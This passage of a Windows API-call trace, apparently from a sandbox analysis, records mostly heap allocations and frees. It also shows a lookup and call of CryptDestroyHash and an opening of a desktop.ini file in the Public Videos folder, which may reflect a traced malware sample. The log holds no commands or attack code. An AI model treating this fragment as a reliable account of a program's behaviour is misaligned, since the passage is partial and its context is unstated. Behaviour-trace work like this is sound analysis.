dwFlags=0x0, lpMem=0x2e51f40 | out: hHeap=0x970000) returned 1 [0269.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0269.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0269.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0269.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52228 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52468 [0269.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52228 | out: hHeap=0x970000) returned 1 [0269.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52468 | out: hHeap=0x970000) returned 1 [0269.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52330 [0269.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0269.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52390 [0269.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0269.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523a8 [0269.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52390 | out: hHeap=0x970000) returned 1 [0269.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523a8 | out: hHeap=0x970000) returned 1 [0269.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523a8 [0269.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0269.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69bc8 [0269.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69bc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0269.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523a8 | out: hHeap=0x970000) returned 1 [0269.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0269.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0269.348] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0269.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0269.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52378 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52378 | out: hHeap=0x970000) returned 1 [0269.349] CryptDestroyHash (hHash=0xa87050) returned 1 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52348 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52360 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521e0 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0269.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521e0 | out: hHeap=0x970000) returned 1 [0269.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52360 | out: hHeap=0x970000) returned 1 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52270 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52360 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521c8 [0269.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521c8 | out: hHeap=0x970000) returned 1 [0269.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52360 | out: hHeap=0x970000) returned 1 [0269.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52330 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f40 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52348 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52270 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52150 | out: hHeap=0x970000) returned 1 [0269.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52078 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0269.351] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0269.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0269.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0269.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0269.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0269.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52438 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52450 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e524b0 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523c0 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52318 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523f0 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0269.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f28 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0269.353] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0269.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0269.354] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0269.354] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0269.354] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0269.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0269.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0269.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0269.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0269.355] CreateFileW (lpFileName="C:\\Users\\Public\\Videos/desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0269.355] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0269.355] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0269.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0269.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0269.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0269.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0269.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0269.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.355] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0269.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0269.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0269.356] RtlAllocateHeap 